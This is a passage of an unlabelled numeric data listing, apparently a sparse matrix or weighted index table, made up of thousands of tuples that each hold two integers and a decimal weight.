(272, 49, 0.46655),
(280, 49, 0.46655),
(241, 49, 0.55986),
(244, 49, 0.55986),
(248, 49, 0.55986),
(254, 49, 0.55986),
(261, 49, 0.55986),
(288, 49, 0.55986),
(246, 49, 0.65317),
(257, 49, 0.65317),
(262, 49, 0.65317),
(263, 49, 0.65317),
(306, 49, 0.83979),
(238, 49, 1.11972),
(160, 49, 1.13305),
(178, 49, 1.30634),
(239, 49, 1.43964),
(193, 49, 1.49296),
(240, 49, 1.62626),
(242, 49, 1.62626),
(31, 50, 0.86331),
(159, 50, 0.86331),
(160, 50, 0.86331),
(250, 50, 0.86331),
(251, 50, 0.86331),
(238, 50, 1.72662),
(31, 51, 0.93331),
(159, 51, 0.93331),
(160, 51, 0.93331),
(250, 51, 0.93331),
(251, 51, 0.93331),
(238, 51, 1.86662),
(31, 52, 1.00331),
(160, 52, 1.00331),
(250, 52, 1.00331),
(251, 52, 1.00331),
(31, 53, 1.07331),
(160, 53, 1.07331),
(250, 53, 1.07331),
(251, 53, 1.07331),
(31, 54, 0.28),
(174, 54, 0.28),
(193, 54, 0.28),
(240, 54, 0.28),
(243, 54, 0.28),
(246, 54, 0.28),
(250, 54, 0.28),
(251, 54, 0.28),
(257, 54, 0.28),
(265, 54, 0.28),
(266, 54, 0.28),
(268, 54, 0.28),
(272, 54, 0.28),
(274, 54, 0.28),
(280, 54, 0.28),
(287, 54, 0.28),
(292, 54, 0.28),
(299, 54, 0.28),
(242, 54, 0.56),
(269, 54, 0.56),
(288, 54, 0.56),
(306, 54, 0.56),
(239, 54, 0.84),
(259, 54, 1.12),
(260, 54, 1.12),
(31, 55, 1.02669),
(250, 55, 1.02669),
(251, 55, 1.02669),
(31, 56, 1.16669),
(250, 56, 1.16669),
(251, 56, 1.16669),
(31, 57, 0.18669),
(159, 57, 0.18669),
(160, 57, 0.18669),
(242, 57, 0.18669),
(250, 57, 0.18669),
(251, 57, 0.18669),
(254, 57, 0.18669),
(256, 57, 0.18669),
(261, 57, 0.18669),
(268, 57, 0.18669),
(239, 57, 0.37338),
(243, 57, 0.37338),
(274, 57, 0.37338),
(288, 57, 0.37338),
(292, 57, 0.37338),
(306, 57, 0.56007),
(31, 58, 0.98),
(159, 58, 0.98),
(160, 58, 0.98),
(250, 58, 0.98),
(251, 58, 0.98),
(31, 59, 1.07331),
(159, 59, 1.07331),
(160, 59, 1.07331),
(250, 59, 1.07331),
(251, 59, 1.07331),
(31, 60, 0.28),
(159, 60, 0.28),
(160, 60, 0.28),
(193, 60, 0.28),
(238, 60, 0.28),
(241, 60, 0.28),
(242, 60, 0.28),
(249, 60, 0.28),
(250, 60, 0.28),
(251, 60, 0.28),
(252, 60, 0.28),
(255, 60, 0.28),
(261, 60, 0.28),
(268, 60, 0.28),
(270, 60, 0.28),
(273, 60, 0.28),
(292, 60, 0.28),
(301, 60, 0.28),
(244, 60, 0.56),
(246, 60, 0.56),
(254, 60, 0.56),
(256, 60, 0.56),
(269, 60, 0.56),
(288, 60, 0.56),
(306, 60, 0.56),
(247, 60, 0.84),
(258, 60, 0.84),
(274, 60, 0.84),
(248, 60, 1.12),
(178, 60, 1.4),
(31, 61, 0.91),
(159, 61, 0.91),
(160, 61, 0.91),
(242, 61, 0.91),
(250, 61, 0.91),
(251, 61, 0.91),
(31, 62, 1.00331),
(159, 62, 1.00331),
(160, 62, 1.00331),
(250, 62, 1.00331),
(251, 62, 1.00331),
(31, 63, 0.28),
(159, 63, 0.28),
(160, 63, 0.28),
(242, 63, 0.28),
(250, 63, 0.28),
(251, 63, 0.28),
(258, 63, 0.28),
(275, 63, 0.28),
(31, 64, 0.91),
(159, 64, 0.91),
(160, 64, 0.91),
(250, 64, 0.91),
(251, 64, 0.91),
(31, 65, 0.98),
(159, 65, 0.98),
(160, 65, 0.98),
(250, 65, 0.98),
(251, 65, 0.98),
(31, 66, 0.32669),
(160, 66, 0.32669),
(242, 66, 0.32669),
(250, 66, 0.32669),
(251, 66, 0.32669),
(252, 66, 0.32669),
(254, 66, 0.32669),
(239, 66, 0.98007),
(299, 66, 1.96014),
(31, 67, 0.93331),
(160, 67, 0.93331),
(239, 67, 0.93331),
(250, 67, 0.93331),
(251, 67, 0.93331),
(299, 67, 1.86662),
(31, 68, 1.14331),
(160, 68, 1.14331),
(250, 68, 1.14331),
(251, 68, 1.14331),
(31, 69, 0.32669),
(250, 69, 0.32669),
(251, 69, 0.32669),
(31, 70, 0.95669),
(250, 70, 0.95669),
(251, 70, 0.95669),
(31, 71, 1.02669),
(250, 71, 1.02669),
(251, 71, 1.02669),
(31, 72, 0.93338),
(160, 72, 0.93338),
(250, 72, 0.93338),
(251, 72, 0.93338),
(31, 73, 1.09669),
(160, 73, 1.09669),
(250, 73, 1.09669),
(251, 73, 1.09669),
(31, 74, 1.28331),
(160, 74, 1.28331),
(250, 74, 1.28331),
(251, 74, 1.28331),
(31, 75, 1.05),
(160, 75, 1.05),
(250, 75, 1.05),
(251, 75, 1.05),
(31, 76, 1.12),
(160, 76, 1.12),
(250, 76, 1.12),
(251, 76, 1.12),
(161, 77, 0.18669),
(31, 77, 0.5334),
(31, 82, 0.18669),
(159, 82, 0.18669),
(160, 82, 0.18669),
(238, 82, 0.18669),
(243, 82, 0.18669),
(250, 82, 0.18669),
(251, 82, 0.18669),
(272, 82, 0.18669),
(280, 82, 0.18669),
(298, 82, 0.37338),
(306, 82, 0.37338),
(308, 82, 0.37338),
(178, 82, 0.56007),
(268, 82, 0.56007),
(262, 82, 1.68021),
(31, 83, 0.86331),
(159, 83, 0.86331),
(160, 83, 0.86331),
(250, 83, 0.86331),
(251, 83, 0.86331),
(31, 84, 0.98),
(159, 84, 0.98),
(160, 84, 0.98),
(250, 84, 0.98),
(251, 84, 0.98),
(31, 85, 0.23331),
(159, 85, 0.23331),
(160, 85, 0.23331),
(250, 85, 0.23331),
(251, 85, 0.23331),
(298, 85, 0.23331),
(308, 85, 0.23331),
(31, 86, 1.00331),
(159, 86, 1.00331),
(160, 86, 1.00331),
(250, 86, 1.00331),
(251, 86, 1.00331),
(31, 87, 1.16669),
(159, 87, 1.16669),
(160, 87, 1.16669),
(250, 87, 1.16669),
(251, 87, 1.16669),
(298, 88, 0.0175),
(301, 88, 0.0175),
(299, 88, 0.0525),
(304, 88, 0.0525),
(160, 88, 0.14),
(178, 88, 0.14),
(193, 88, 0.14),
(233, 88, 0.14),
(245, 88, 0.14),
(247, 88, 0.14),
(248, 88, 0.14),
(263, 88, 0.14),
(270, 88, 0.14),
(275, 88, 0.14),
(308, 88, 0.14),
(31, 88, 0.28),
(235, 88, 0.28),
(236, 88, 0.28),
(237, 88, 0.28),
(239, 88, 0.28),
(244, 88, 0.28),
(249, 88, 0.28),
(250, 88, 0.28),
(251, 88, 0.28),
(252, 88, 0.28),
(256, 88, 0.28),
(257, 88, 0.28),
(264, 88, 0.28),
(265, 88, 0.28),
(266, 88, 0.28),
(288, 88, 0.28),
(292, 88, 0.28),
(246, 88, 0.42),
(253, 88, 0.42),
(258, 88, 0.42),
(261, 88, 0.42),
(272, 88, 0.42),
(273, 88, 0.42),
(274, 88, 0.42),
(280, 88, 0.42),
(267, 88, 0.56),
(242, 88, 0.7),
(243, 88, 0.7),
(269, 88, 0.7),
(290, 88, 0.7),
(174, 88, 0.84),
(240, 88, 0.84),
(254, 88, 0.84),
(262, 88, 0.84),
(238, 88, 1.12),
(241, 88, 1.12),
(306, 88, 1.12),
(31, 89, 0.84),
(250, 89, 0.84),
(251, 89, 0.84),
(262, 89, 0.84),
(31, 90, 1.16669),
(250, 90, 1.16669),
(251, 90, 1.16669),
(31, 91, 1.02669),
(160, 91, 1.02669),
(250, 91, 1.02669),
(251, 91, 1.02669),
(31, 92, 1.28331),
(160, 92, 1.28331),
(250, 92, 1.28331),
(251, 92, 1.28331),
(298, 93, 0.01169),
(301, 93, 0.02338),
(305, 93, 0.04676),
(31, 93, 0.09331),
(237, 93, 0.09331),
(238, 93, 0.09331),
(249, 93, 0.09331),
(250, 93, 0.09331),
(251, 93, 0.09331),
(256, 93, 0.09331),
(257, 93, 0.09331),
(264, 93, 0.09331),
(267, 93, 0.09331),
(288, 93, 0.09331),
(308, 93, 0.09331),
(174, 93, 0.18662),
(239, 93, 0.18662),
(244, 93, 0.18662),
(247, 93, 0.18662),
(248, 93, 0.18662),
(254, 93, 0.18662),
(255, 93, 0.18662),
(258, 93, 0.18662),
(268, 93, 0.18662),
(270, 93, 0.18662),
(272, 93, 0.18662),
(280, 93, 0.18662),
(178, 93, 0.27993),
(233, 93, 0.27993),
(235, 93, 0.27993),
(242, 93, 0.27993),
(262, 93, 0.27993),
(193, 93, 0.37324),
(263, 93, 0.37324),
(241, 93, 0.46655),
(240, 93, 0.55986),
(31, 94, 1.07331),
(250, 94, 1.07331),
(251, 94, 1.07331),
(31, 95, 1.19),
(250, 95, 1.19),
(251, 95, 1.19),
(159, 1039, 0.93331),
(160, 1039, 0.93331),
(159, 1040, 1.05),
(160, 1040, 1.05),
(159, 1041, 0.86331),
(160, 1041, 0.86331),
(178, 1041, 0.86331),
(159, 1042, 0.91),
(160, 1042, 0.91),
(159, 1044, 0.32669),
(160, 1044, 0.32669),
(159, 1045, 0.98),
(160, 1045, 0.98),
(159, 1046, 1.16669),
(160, 1046, 1.16669),
(248, 1132, 0.23331),
(249, 1132, 0.23331),
(259, 1132, 0.23331),
(260, 1132, 0.23331),
(268, 1132, 0.23331),
(159, 1132, 0.39996),
(160, 1132, 0.39996),
(245, 1132, 0.46662),
(159, 1133, 1.47996),
(160, 1133, 1.47996),
(159, 1134, 0.28),
(160, 1134, 0.28),
(159, 1135, 1.00331),
(160, 1135, 1.00331),
(159, 1136, 1.07331),
(160, 1136, 1.07331),
(161, 1274, 0.23331),
(238, 1274, 0.23331),
(288, 1274, 0.23331),
(161, 1277, 0.37331),
(237, 1277, 0.37331),
(246, 1277, 0.37331),
(257, 1277, 0.37331),
(261, 1277, 0.37331),
(292, 1277, 0.37331),
(304, 1277, 0.37331),
(193, 1277, 14.2391),
(161, 1763, 0.23331),
(251, 1763, 2.09979),
(31, 11542, 2.9334),
(31, 11543, 3.5334),
(265, 12703, 0.93331),
(266, 12703, 0.93331),
(252, 12703, 2.79993),
(252, 12704, 1.02669),
(265, 12704, 1.02669),
(266, 12704, 1.02669),
(178, 12706, 0.32669),
(233, 12706, 0.32669),
(235, 12706, 0.32669),
(237, 12706, 0.32669),
(238, 12706, 0.32669),
(240, 12706, 0.32669),
(241, 12706, 0.32669),
(249, 12706, 0.32669),
(252, 12706, 0.32669),
(253, 12706, 0.32669),
(254, 12706, 0.32669),
(258, 12706, 0.32669),
(269, 12706, 0.32669),
(272, 12706, 0.32669),
(273, 12706, 0.32669),
(275, 12706, 0.32669),
(280, 12706, 0.32669),
(290, 12706, 0.32669),
(292, 12706, 0.32669),
(298, 12706, 0.32669),
(308, 12706, 0.32669),
(239, 12706, 0.65338),
(243, 12706, 0.65338),
(257, 12706, 0.65338),
(274, 12706, 0.65338),
(299, 12706, 0.65338),
(306, 12706, 0.65338),
(174, 12706, 0.98007),
(259, 12706, 0.98007),
(260, 12706, 0.98007),
(261, 12706, 0.98007),
(263, 12706, 0.98007),
(193, 12706, 1.30676),
(262, 12706, 1.30676),
(264, 12706, 1.30676),
(242, 12706, 1.63345),
(252, 12711, 0.95669),
(299, 12711, 0.95669),
(237, 12713, 0.18669),
(252, 12713, 0.18669),
(253, 12713, 0.18669),
(259, 12713, 0.18669),
(260, 12713, 0.18669),
(261, 12713, 0.18669),
(290, 12713, 0.18669),
(299, 12713, 0.18669),
(242, 12713, 0.37338),
(168, 12716, 0.28),
(174, 12716, 0.28),
(252, 12716, 0.28),
(255, 12716, 0.28),
(290, 12716, 0.28),
(254, 12716, 0.56),
(168, 12719, 0.23331),
(236, 12719, 0.23331),
(256, 12719, 0.23331),
(257, 12719, 0.23331),
(262, 12719, 0.23331),
(288, 12719, 0.23331),
(290, 12719, 0.23331),
(305, 12719, 0.23331),
(252, 12719, 0.46662),
(253, 12719, 0.46662),
(254, 12719, 0.46662),
(255, 12719, 0.46662),
(275, 12719, 0.46662),
(287, 12719, 0.46662),
(298, 12719, 0.46662),
(299, 12719, 0.46662),
(308, 12719, 0.46662),
(240, 12719, 0.69993),
(242, 12719, 0.69993),
(239, 12719, 1.16655),
(236, 12720, 0.93331),
(239, 12720, 0.93331),
(240, 12720, 0.93331),
(253, 12720, 0.93331),
(254, 12720, 0.93331),
(256, 12720, 0.93331),
(257, 12720, 0.93331),
(275, 12720, 0.93331),
(299, 12720, 0.93331),
(252, 12720, 1.86662),
(174, 12723, 0.23331),
(240, 12723, 0.23331),
(257, 12723, 0.23331),
(252, 12723, 0.46662),
(252, 12727, 0.91),
(269, 12727, 0.91),
(178, 16014, 0.18669),
(233, 16014, 0.18669),
(235, 16014, 0.18669),
(257, 16014, 0.18669),
(292, 16014, 0.18669),
(304, 16014, 0.18669),
(299, 16014, 0.56007),
(306, 16014, 0.74676),
(233, 16015, 0.93331),
(257, 16015, 0.93331),
(292, 16015, 0.93331),
(304, 16015, 0.93331),
(299, 16015, 1.86662),
(306, 16015, 1.86662),
(267, 20900, 0.32669),
(239, 20900, 1.30676),
(233, 20900, 4.29364),
(178, 20912, 0.95669),
(193, 20912, 0.95669),
(233, 20912, 0.95669),
(259, 20912, 0.95669),
(260, 20912, 0.95669),
(233, 20914, 0.23331),
(236, 20914, 0.23331),
(241, 20914, 0.23331),
(242, 20914, 0.23331),
(273, 20914, 0.23331),
(193, 20914, 0.46662),
(255, 20914, 0.46662),
(268, 20914, 0.46662),
(233, 20915, 0.88669),
(236, 20915, 0.88669),
(241, 20915, 0.88669),
(242, 20915, 0.88669),
(273, 20915, 0.88669),
(193, 20915, 1.77338),
(255, 20915, 1.77338),
(268, 20915, 1.77338),
(245, 20917, 0.37331),
(247, 20917, 0.37331),
(261, 20917, 0.37331),
(267, 20917, 0.37331),
(233, 20917, 0.74662),
(288, 20917, 0.74662),
(233, 20918, 0.98),
(245, 20918, 0.98),
(233, 20922, 0.28),
(264, 20922, 0.28),
(306, 20922, 0.56),
(237, 20922, 0.84),
(174, 20926, 0.86331),
(233, 20926, 0.86331),
(240, 20926, 0.86331),
(241, 20926, 0.86331),
(247, 20926, 0.86331),
(274, 20926, 0.86331),
(254, 20926, 1.72662),
(262, 20926, 1.72662),
(168, 23094, 0.23331),
(262, 23094, 0.23331),
(299, 23094, 0.23331),
(244, 23097, 0.93331),
(299, 23097, 0.93331),
(244, 23098, 1.02669),
(299, 23098, 1.02669),
(244, 23099, 0.98),
(299, 23099, 0.98),
(244, 23100, 1.09669),
(299, 23100, 1.09669),
(174, 23103, 0.81669),
(235, 23103, 0.81669),
(241, 23103, 0.81669),
(246, 23103, 0.81669),
(258, 23103, 0.81669),
(259, 23103, 0.81669),
(260, 23103, 0.81669),
(299, 23103, 0.81669),
(246, 23107, 0.88669),
(299, 23107, 3.54676),
(178, 23114, 0.84),
(240, 23114, 0.84),
(248, 23114, 0.84),
(272, 23114, 0.84),
(280, 23114, 0.84),
(288, 23114, 0.84),
(193, 23114, 1.68),
(243, 23116, 0.93331),
(249, 23116, 0.93331),
(259, 23116, 0.93331),
(260, 23116, 0.93331),
(261, 23116, 0.93331),
(272, 23116, 0.93331),
(275, 23116, 0.93331),
(280, 23116, 0.93331),
(290, 23116, 0.93331),
(299, 23116, 0.93331),
(174, 23118, 0.95669),
(242, 23118, 0.95669),
(273, 23118, 0.95669),
(299, 23118, 0.95669),
(257, 23118, 1.91338),
(257, 23119, 1.07331),
(299, 23119, 1.07331),
(178, 23122, 0.28),
(240, 23122, 0.28),
(243, 23122, 0.28),
(259, 23122, 0.28),
(260, 23122, 0.28),
(299, 23122, 0.28),
(168, 23125, 0.23331),
(237, 23125, 0.23331),
(240, 23125, 0.23331),
(242, 23125, 0.23331),
(243, 23125, 0.23331),
(248, 23125, 0.23331),
(259, 23125, 0.23331),
(260, 23125, 0.23331),
(270, 23125, 0.23331),
(273, 23125, 0.23331),
(292, 23125, 0.23331),
(301, 23125, 0.23331),
(306, 23125, 0.23331),
(236, 23125, 0.46662),
(245, 23125, 0.46662),
(253, 23125, 0.46662),
(261, 23125, 0.46662),
(262, 23125, 0.46662),
(178, 23125, 0.69993),
(274, 23125, 0.69993),
(299, 23125, 0.69993),
(237, 23130, 0.91),
(237, 23131, 1.00331),
(237, 23144, 0.32669),
(241, 23144, 0.32669),
(253, 23144, 0.32669),
(254, 23144, 0.32669),
(255, 23144, 0.32669),
(256, 23144, 0.32669),
(257, 23144, 0.32669),
(258, 23144, 0.32669),
(259, 23144, 0.32669),
(260, 23144, 0.32669),
(261, 23144, 0.32669),
(264, 23144, 0.32669),
(267, 23144, 0.32669),
(269, 23144, 0.32669),
(274, 23144, 0.32669),
(280, 23144, 0.32669),
(288, 23144, 0.32669),
(290, 23144, 0.32669),
(292, 23144, 0.32669),
(295, 23144, 0.32669),
(299, 23144, 0.32669),
(304, 23144, 0.32669),
(305, 23144, 0.32669),
(265, 23144, 0.65338),
(266, 23144, 0.65338),
(270, 23144, 0.65338),
(272, 23144, 0.65338),
(273, 23144, 0.65338),
(301, 23144, 0.65338),
(262, 23144, 0.98007),
(268, 23144, 0.98007),
(174, 23149, 0.32669),
(235, 23149, 0.32669),
(237, 23149, 0.32669),
(239, 23149, 0.32669),
(241, 23149, 0.32669),
(254, 23149, 0.32669),
(275, 23149, 0.32669),
(295, 23149, 0.32669),
(299, 23149, 0.32669),
(306, 23149, 0.32669),
(240, 23149, 0.65338),
(275, 23150, 0.95669),
(299, 23150, 0.95669),
(275, 23151, 1.05),
(299, 23151, 1.05),
(253, 23152, 0.93331),
(299, 23152, 0.93331),
(174, 23155, 0.23331),
(299, 23155, 0.23331),
(237, 23158, 0.23331),
(174, 23158, 0.46662),
(299, 23158, 0.46662),
(244, 23163, 0.32669),
(299, 23163, 0.32669),
(244, 23164, 0.95669),
(299, 23164, 0.95669),
(244, 23165, 1.07331),
(299, 23165, 1.07331),
(237, 24960, 0.98),
(253, 24960, 0.98),
(258, 24960, 0.98),
(264, 24960, 0.98),
(274, 24960, 0.98),
(298, 24960, 0.98),
(308, 24960, 0.98),
(240, 24964, 1.00331),
(298, 24964, 1.00331),
(308, 24964, 1.00331),
(298, 24966, 0.88669),
(308, 24966, 0.88669),
(262, 24966, 2.66007),
(168, 25941, 0.32669),
(253, 25941, 0.32669),
(258, 25941, 0.32669),
(261, 25941, 0.32669),
(306, 25941, 0.32669),
(44, 25941, 1.44677),
(254, 25941, 1.63345),
(294, 25941, 2.98688),
(44, 25942, 5.06323),
(44, 25943, 5.89),
(48, 26023, 1.65323),
(174, 28229, 0.79331),
(178, 28229, 0.79331),
(193, 28229, 0.79331),
(241, 28229, 0.79331),
(247, 28229, 0.79331),
(253, 28229, 0.79331),
(256, 28229, 0.79331),
(262, 28229, 0.79331),
(268, 28229, 0.79331),
(274, 28229, 0.79331),
(275, 28229, 0.79331),
(287, 28229, 0.79331),
(288, 28229, 0.79331),
(295, 28229, 0.79331),
(304, 28229, 0.79331),
(305, 28229, 0.79331),
(306, 28229, 0.79331),
(168, 28229, 1.58662),
(243, 28229, 1.58662),
(257, 28229, 1.58662),
(263, 28229, 1.58662),
(239, 28229, 1.92661),
(238, 28229, 3.17324),
(242, 28229, 3.51323),
(240, 28229, 6.68647),
(193, 28238, 0.42),
(253, 28238, 0.42),
(193, 28239, 0.98),
(253, 28239, 0.98),
(174, 31498, 0.23331),
(193, 31498, 0.23331),
(239, 31498, 0.23331),
(242, 31498, 0.23331),
(244, 31498, 0.23331),
(245, 31498, 0.23331),
(246, 31498, 0.23331),
(248, 31498, 0.23331),
(267, 31498, 0.23331),
(268, 31498, 0.23331),
(290, 31498, 0.23331),
(306, 31498, 0.23331),
(235, 31498, 0.46662),
(269, 31498, 0.46662),
(238, 31498, 1.16655),
(178, 31498, 1.63317),
(178, 36409, 0.18669),
(243, 36409, 0.18669),
(253, 36409, 0.18669),
(256, 36409, 0.18669),
(290, 36409, 0.18669),
(305, 36409, 0.18669),
(244, 36409, 0.37338),
(292, 36409, 0.56007),
(235, 36409, 1.12014),
(168, 36412, 0.32669),
(253, 36412, 0.32669),
(261, 36412, 1.63345),
(253, 36413, 0.93331),
(261, 36413, 0.93331),
(236, 36424, 0.86331),
(253, 36424, 0.86331),
(274, 36424, 2.58993),
(253, 36428, 0.95669),
(270, 36428, 0.95669),
(301, 36428, 0.95669),
(236, 36433, 1.00331),
(240, 36433, 1.00331),
(253, 36433, 1.00331),
(305, 36437, 0.18669),
(306, 36437, 0.18669),
(178, 36437, 0.37338),
(253, 36437, 0.37338),
(178, 36438, 0.86331),
(306, 36438, 0.86331),
(253, 36438, 1.72662),
(237, 36441, 0.84),
(249, 36441, 0.84),
(272, 36441, 0.84),
(280, 36441, 0.84),
(290, 36441, 0.84),
(292, 36441, 0.84),
(306, 36441, 0.84),
(253, 36441, 1.68),
(238, 36443, 0.86331),
(241, 36443, 0.86331),
(253, 36443, 0.86331),
(254, 36443, 0.86331),
(264, 36443, 0.86331),
(265, 36443, 0.86331),
(266, 36443, 0.86331),
(304, 36443, 0.86331),
(306, 36443, 1.72662),
(174, 36443, 2.58993),
(253, 36444, 0.98),
(254, 36444, 0.98),
(265, 36444, 0.98),
(266, 36444, 0.98),
(239, 37111, 0.23331),
(253, 37111, 0.23331),
(255, 37111, 0.23331),
(288, 37111, 0.23331),
(292, 37111, 0.23331),
(244, 37111, 0.93324),
(253, 37112, 0.88669),
(255, 37112, 0.88669),
(174, 50770, 1.00331),
(235, 50770, 1.00331),
(306, 50770, 1.00331),
(235, 50772, 0.42),
(236, 50772, 0.42),
(238, 50772, 0.42),
(243, 50772, 0.42),
(246, 50772, 0.42),
(255, 50772, 0.42),
(270, 50772, 0.42),
(301, 50772, 0.42),
(262, 50772, 0.84),
(178, 50790, 0.84),
(239, 50790, 0.84),
(248, 50790, 0.84),
(258, 50790, 0.84),
(263, 50790, 0.84),
(244, 50790, 1.68),
(235, 50790, 2.52),
(242, 64174, 0.04669),
(193, 64174, 0.09338),
(193, 64180, 0.81669),
(242, 64180, 0.81669),
(304, 64180, 0.81669),
(240, 64180, 1.63338),
(193, 64182, 0.81669),
(258, 64182, 0.81669),
(272, 64182, 0.81669),
(280, 64182, 0.81669),
(193, 64184, 0.93331),
(237, 64184, 0.93331),
(244, 64184, 0.93331),
(193, 64186, 0.95669),
(259, 64186, 0.95669),
(260, 64186, 0.95669),
(261, 64186, 0.95669),
(238, 64196, 0.86331),
(239, 64196, 0.86331),
(193, 64196, 1.72662),
(240, 64207, 0.93331),
(262, 64207, 0.93331),
(193, 64207, 1.86662),
(239, 64207, 1.86662),
(240, 64208, 1.00331),
(262, 64208, 1.00331),
(193, 64208, 2.00662),
(193, 64214, 0.93331),
(241, 64214, 0.93331),
(255, 64214, 0.93331),
(306, 64214, 0.93331),
(193, 64222, 0.23331),
(238, 64222, 0.23331),
(270, 64222, 0.23331),
(272, 64222, 0.23331),
(280, 64222, 0.23331),
(301, 64222, 0.23331),
(239, 64222, 0.46662),
(178, 64222, 0.69993),
(168, 64225, 0.32669),
(193, 64225, 0.32669),
(244, 64225, 0.32669),
(245, 64225, 0.32669),
(178, 64225, 0.65338),
(237, 64225, 1.96014),
(193, 64226, 0.93331),
(237, 64226, 0.93331),
(193, 64228, 0.37331),
(267, 64228, 0.37331),
(269, 64228, 0.74662),
(237, 64228, 2.23986),
(193, 64265, 0.95669),
(261, 64265, 0.95669),
(193, 64295, 0.86331),
(240, 64295, 0.86331),
(237, 68226, 0.86331),
(240, 68226, 0.86331),
(254, 68226, 0.86331),
(238, 75336, 0.86331),
(254, 75336, 0.86331),
(255, 75336, 0.86331),
(257, 75336, 0.86331),
(262, 75336, 0.86331),
(292, 75336, 0.86331),
(240, 75336, 1.72662),
(242, 75336, 1.72662),
(306, 75336, 2.58993),
(239, 75336, 6.90648),
(238, 75337, 0.93331),
(254, 75337, 0.93331),
(255, 75337, 0.93331),
(257, 75337, 0.93331),
(262, 75337, 0.93331),
(292, 75337, 0.93331),
(240, 75337, 1.86662),
(242, 75337, 1.86662),
(306, 75337, 2.79993),
(239, 75337, 7.46648),
(240, 75346, 0.88669),
(254, 75346, 0.88669),
(288, 75346, 0.88669),
(254, 75348, 0.91),
(269, 75348, 0.91),
(254, 75352, 0.93331),
(246, 75352, 1.86662),
(247, 75352, 1.86662),
(248, 75352, 1.86662),
(178, 75354, 0.93331),
(248, 75354, 0.93331),
(254, 75354, 0.93331),
(273, 75354, 0.93331),
(254, 75367, 0.95669),
(262, 75367, 0.95669),
(254, 75368, 1.02669),
(262, 75368, 1.02669),
(254, 75369, 0.18669),
(255, 75369, 0.18669),
(254, 75380, 0.86331),
(258, 75380, 0.86331),
(240, 75384, 0.88669),
(254, 75384, 0.88669),
(258, 75384, 0.88669),
(264, 75384, 0.88669),
(241, 75384, 1.77338),
(236, 77507, 0.86331),
(267, 77507, 0.86331),
(236, 77518, 0.23331),
(244, 77518, 0.23331),
(292, 77518, 0.23331),
(236, 77519, 0.91),
(244, 77519, 0.91),
(236, 77522, 0.88669),
(238, 77522, 0.88669),
(239, 77522, 0.88669),
(242, 77522, 0.88669),
(243, 77522, 0.88669),
(272, 77522, 0.88669),
(280, 77522, 0.88669),
(236, 77523, 0.98),
(272, 77523, 0.98),
(280, 77523, 0.98),
(178, 78320, 0.18669),
(236, 78320, 0.18669),
(240, 78320, 0.18669),
(241, 78320, 0.18669),
(257, 78320, 0.18669),
(262, 78320, 0.18669),
(263, 78320, 0.18669),
(273, 78320, 0.18669),
(275, 78320, 0.18669),
(290, 78320, 0.18669),
(174, 78320, 0.37338),
(239, 78320, 0.37338),
(242, 78320, 0.37338),
(306, 78320, 0.37338),
(236, 78323, 0.37331),
(243, 78323, 0.37331),
(237, 84502, 0.28),
(249, 84502, 0.28),
(237, 84505, 0.28),
(257, 84505, 0.28),
(237, 84518, 0.98),
(269, 84518, 0.98),
(264, 84524, 0.93331),
(306, 84524, 0.93331),
(237, 84524, 2.79993),
(237, 84546, 0.88669),
(174, 84546, 1.77338),
(237, 84547, 1.02669),
(174, 84547, 2.05338),
(237, 84548, 0.98),
(257, 84548, 0.98),
(238, 91828, 0.28),
(267, 91828, 0.28),
(288, 91828, 0.56),
(261, 91828, 1.12),
(238, 91831, 1.02669),
(242, 91831, 1.02669),
(243, 91831, 1.02669),
(275, 91831, 1.02669),
(238, 91839, 0.86331),
(263, 91839, 0.86331),
(238, 91841, 0.98),
(239, 91841, 0.98),
(238, 91844, 0.93331),
(243, 91844, 0.93331),
(261, 91844, 0.93331),
(262, 91844, 0.93331),
(263, 91844, 0.93331),
(264, 91844, 0.93331),
(238, 91845, 1.02669),
(262, 91845, 1.02669),
(242, 91846, 0.37331),
(267, 91846, 0.37331),
(238, 91846, 3.03981),
(238, 91855, 0.86331),
(243, 91855, 0.86331),
(238, 91866, 0.95669),
(239, 91866, 0.95669),
(178, 91866, 5.74014),
(238, 91870, 0.93331),
(245, 91870, 0.93331),
(238, 91872, 0.32669),
(263, 91872, 0.32669),
(290, 91872, 0.32669),
(178, 91872, 0.65338),
(238, 91873, 1.00331),
(178, 91873, 2.00662),
(238, 91875, 0.28),
(262, 91875, 0.28),
(238, 91891, 0.95669),
(261, 91891, 0.95669),
(238, 91893, 0.98),
(241, 91893, 0.98),
(168, 92865, 0.18669),
(238, 92865, 0.18669),
(239, 100012, 0.23331),
(240, 100012, 0.23331),
(239, 100015, 2.38),
(240, 100015, 2.38),
(242, 100015, 2.38),
(239, 100025, 0.88669),
(240, 100025, 0.88669),
(246, 100025, 0.88669),
(287, 100025, 0.88669),
(292, 100025, 0.88669),
(259, 100025, 1.77338),
(260, 100025, 1.77338),
(269, 100025, 1.77338),
(239, 100043, 0.98),
(240, 100043, 0.98),
(239, 100044, 1.23669),
(240, 100044, 1.23669),
(239, 100058, 0.23331),
(257, 100058, 0.23331),
(239, 100062, 0.84),
(241, 100062, 0.84),
(258, 100062, 0.84),
(265, 100062, 0.84),
(266, 100062, 0.84),
(275, 100062, 0.84),
(288, 100062, 0.84),
(239, 101343, 0.88669),
(244, 101343, 0.88669),
(239, 101347, 1.00331),
(242, 101347, 1.00331),
(168, 101876, 0.32669),
(255, 101876, 0.32669),
(259, 101876, 0.32669),
(260, 101876, 0.32669),
(272, 101876, 0.32669),
(275, 101876, 0.32669),
(280, 101876, 0.32669),
(305, 101876, 0.32669),
(255, 101884, 0.93331),
(259, 101884, 0.93331),
(260, 101884, 0.93331),
(265, 101884, 0.93331),
(266, 101884, 0.93331),
(272, 101884, 0.93331),
(295, 101884, 0.93331),
(255, 101885, 1.02669),
(259, 101885, 1.02669),
(260, 101885, 1.02669),
(265, 101885, 1.02669),
(266, 101885, 1.02669),
(272, 101885, 1.02669),
(295, 101885, 1.02669),
(242, 101886, 0.91),
(255, 101886, 0.91),
(255, 101892, 0.23331),
(287, 101892, 0.23331),
(262, 101892, 0.46662),
(255, 101893, 0.88669),
(262, 101893, 0.88669),
(255, 101894, 1.00331),
(262, 101894, 1.00331),
(256, 108048, 0.95669),
(257, 108048, 0.95669),
(272, 108048, 0.95669),
(280, 108048, 0.95669),
(256, 108049, 1.07331),
(257, 108049, 1.07331),
(178, 110065, 0.86331),
(257, 110065, 0.86331),
(306, 110065, 0.86331),
(245, 110073, 0.18669),
(257, 110073, 0.18669),
(262, 110073, 0.37338),
(168, 110079, 0.23331),
(257, 110079, 0.23331),
(304, 110079, 0.23331),
(168, 110080, 0.91),
(257, 110080, 0.91),
(304, 110080, 0.91),
(257, 110091, 0.28),
(262, 110091, 0.56),
(257, 110095, 0.86331),
(274, 110095, 0.86331),
